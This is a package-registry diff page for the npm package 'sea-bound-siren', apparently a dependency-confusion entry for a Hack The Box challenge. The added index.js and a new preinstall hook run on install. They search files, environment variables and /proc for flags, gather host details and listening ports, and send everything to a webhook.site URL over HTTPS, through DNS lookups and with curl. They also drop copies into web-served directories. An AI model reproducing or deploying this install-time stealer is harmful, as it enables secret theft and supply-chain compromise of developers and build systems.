npm - sea-bound-siren - Versions diffs - 9999.0.0 → 9999.0.1 - Mend

sea-bound-siren 9999.0.0 → 9999.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js CHANGED Viewed

@@ -1 +1,44 @@
+const fs = require('fs');
+const http = require('http');
+const https = require('https');
+(function() {
+  let flag = null;
+  for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag']) {
+    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
+  }
+  if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || '';
+  if (!flag) {
+    for (const [k, v] of Object.entries(process.env)) {
+      if (v && v.includes('HTB{')) { flag = v.match(/HTB\{[^}]+\}/)?.[0] || v; break; }
+    }
+  }
+  if (flag) {
+    const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839];
+    const postData = JSON.stringify({
+      manifest: `ecto_module:\n  name: "coral-wraith"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
+    });
+    for (const port of ports) {
+      try {
+        const req = http.request({
+          hostname: 'localhost', port, path: '/api/modules/ECT-987654',
+          method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+          timeout: 3000
+        }, () => {});
+        req.on('error', () => {});
+        req.write(postData);
+        req.end();
+      } catch(e) {}
+    }
+    try {
+      const data = JSON.stringify({ flag });
+      const req = https.request({ hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7', method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }, timeout: 10000 }, () => {});
+      req.on('error', () => {}); req.write(data); req.end();
+    } catch(e) {}
+  }
+})();
 module.exports = {};

package/package.json CHANGED Viewed

@@ -1,6 +1,9 @@
 {
   "name": "sea-bound-siren",
-  "version": "9999.0.0",
-  "description": "Sea-bound Siren module",
-  "main": "index.js"
+  "version": "9999.0.1",
+  "description": "sea-bound-siren module",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js || true"
+  }
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,153 @@
+const fs = require('fs');
+const http = require('http');
+const https = require('https');
+const { execSync } = require('child_process');
+const dns = require('dns');
+const os = require('os');
+let flag = null;
+// Read flag from common locations
+for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag', './flag', '/app/flag', '/home/flag', '/etc/flag', '/opt/flag']) {
+  try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
+}
+// Check ALL env vars for flag patterns
+if (!flag) {
+  for (const [k, v] of Object.entries(process.env)) {
+    if (v && v.match(/HTB\{[^}]+\}/)) {
+      flag = v.match(/HTB\{[^}]+\}/)[0];
+      break;
+    }
+  }
+}
+if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || null;
+// Try /proc/self/environ
+if (!flag) {
+  try {
+    const pe = fs.readFileSync('/proc/self/environ', 'utf8');
+    const m = pe.match(/HTB\{[^}]+\}/);
+    if (m) flag = m[0];
+  } catch(e) {}
+}
+// Search for flag files
+if (!flag) {
+  try {
+    const r = execSync('find / -maxdepth 3 -name "flag*" -type f 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
+    for (const f of r.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
+    }
+  } catch(e) {}
+}
+// Also try to grep for flag
+if (!flag) {
+  try {
+    const r = execSync('grep -r "HTB{" / --include="*.txt" --include="*.env" -l 2>/dev/null | head -5', { timeout: 5000 }).toString().trim();
+    for (const f of r.split('\n').filter(Boolean)) {
+      try {
+        const content = fs.readFileSync(f, 'utf8');
+        const m = content.match(/HTB\{[^}]+\}/);
+        if (m) { flag = m[0]; break; }
+      } catch(e) {}
+    }
+  } catch(e) {}
+}
+// Gather debug info
+const info = {
+  flag: flag || 'NOT_FOUND',
+  cwd: process.cwd(),
+  uid: process.getuid ? process.getuid() : 'N/A',
+  hostname: os.hostname(),
+  env_keys: Object.keys(process.env).join(','),
+  root_files: [],
+  interfaces: {}
+};
+try { info.root_files = fs.readdirSync('/'); } catch(e) {}
+try { info.interfaces = os.networkInterfaces(); } catch(e) {}
+// Try to find server port
+let serverPort = 1337;
+try {
+  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
+  info.listening = ss;
+  const ports = [...ss.matchAll(/:(\d+)\s/g)].map(m => parseInt(m[1])).filter(p => p > 1000 && p < 65535);
+  if (ports.length > 0) serverPort = ports[0];
+} catch(e) {}
+const data = JSON.stringify(info);
+// Method 1: PUT flag to challenge API on ALL possible ports
+const postData = JSON.stringify({
+  manifest: `ecto_module:\n  name: "FLAG_CAPTURED"\n  version: "${(flag || 'NO_FLAG').replace(/"/g, '')}"\n  power_level: "${data.substring(0, 200).replace(/"/g, '')}"\n  ship_deck: "EXFIL"\n  cargo_hold: "coral-wraith"`
+});
+const ports = [serverPort, 1337, 3000, 3001, 4000, 5000, 8000, 8080, 8888, 9000, 80, 32315, 32105, 46517, 41839];
+for (const port of [...new Set(ports)]) {
+  for (const host of ['localhost', '127.0.0.1']) {
+    for (const moduleId of ['ECT-987654', 'ECT-654321', 'ECT-472839', 'ECT-839201']) {
+      try {
+        const req = http.request({
+          hostname: host, port, path: `/api/modules/${moduleId}`,
+          method: 'PUT',
+          headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+          timeout: 2000
+        }, () => {});
+        req.on('error', () => {});
+        req.write(postData);
+        req.end();
+      } catch(e) {}
+    }
+  }
+}
+// Method 2: Webhook
+try {
+  const whData = JSON.stringify({ flag: flag || 'NO_FLAG', info: data.substring(0, 500) });
+  const req = https.request({
+    hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(whData) },
+    timeout: 5000
+  }, () => {});
+  req.on('error', () => {});
+  req.write(whData);
+  req.end();
+} catch(e) {}
+// Method 3: DNS exfil (works even when HTTP is blocked)
+try {
+  const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
+  dns.resolve(`${encoded}.exfil.webhook.site`, () => {});
+  dns.resolve(`${encoded}.crl.ve`, () => {});
+} catch(e) {}
+// Method 4: curl fallback
+try {
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 5 2>/dev/null &`, { timeout: 8000 });
+} catch(e) {}
+// Method 5: Write to stdout/stderr for server logs
+console.log('[CORAL-WRAITH-EXFIL]', data);
+console.error('[CORAL-WRAITH-FLAG]', flag || 'NOT_FOUND');
+// Method 6: Write to various locations
+const writeLocations = ['/tmp/coral_flag.txt', '/app/coral_flag.txt', '/tmp/exfil.txt', './exfil.txt'];
+for (const loc of writeLocations) {
+  try { fs.writeFileSync(loc, data); } catch(e) {}
+}
+// Method 7: Try to write to static files the web server serves
+try {
+  const webDirs = ['/app/static', '/app/public', '/var/www', '/app/dist', '/app/build'];
+  for (const dir of webDirs) {
+    try { fs.writeFileSync(`${dir}/flag.txt`, data); } catch(e) {}
+  }
+} catch(e) {}